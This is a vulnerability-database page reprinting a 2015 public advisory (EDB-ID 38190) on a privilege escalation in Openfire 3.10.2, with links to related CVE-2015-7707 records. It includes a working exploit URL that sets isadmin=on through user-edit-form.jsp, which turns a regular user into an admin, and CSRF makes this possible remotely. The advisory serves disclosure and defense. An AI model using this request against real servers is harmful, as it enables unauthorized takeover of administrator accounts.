Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbHyp3rlinxEDB-ID:38190
HistorySep 15, 2015 - 12:00 a.m.

Openfire 3.10.2 - Privilege Escalation

2015-09-1500:00:00
hyp3rlinx
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

JSON
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Privilege escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.





Exploit code(s):
===============

Become admin!

http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&[email protected]&isadmin=on




Disclosure Timeline:
=========================================================

Vendor Notification: NA
Sept 14, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local or Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] Openfire 3.10.2


Vulnerable Parameter(s):        [+] isadmin


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx

Related

prion 1
cvelist 1
packetstorm 1
cve 1
nvd 1
nessus 1
gentoo 1
archlinux 1
openvas 1
prion
prion
Code injection
2015-10-05 15:59:00
cvelist
cvelist
CVE-2015-7707
2015-10-05 15:00:00
packetstorm
packetstorm
Openfire 3.10.2 Privilege Escalation
2015-09-15 00:00:00
cve
cve
CVE-2015-7707
2015-10-05 15:59:03
nvd
nvd
CVE-2015-7707
2015-10-05 15:59:03
nessus
nessus
GLSA-201612-50 : Openfire: Multiple vulnerabilities
2017-01-03 00:00:00
gentoo
gentoo
Openfire: Multiple vulnerabilities
2016-12-31 00:00:00
archlinux
archlinux
[ASA-201612-21] openfire: multiple issues
2016-12-23 00:00:00
openvas
openvas
OpenFire <= 3.10.2 Multiple Vulnerabilities
2015-10-19 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:38190
prion1cvelist1packetstorm1cve1nvd1nessus1gentoo1archlinux1openvas1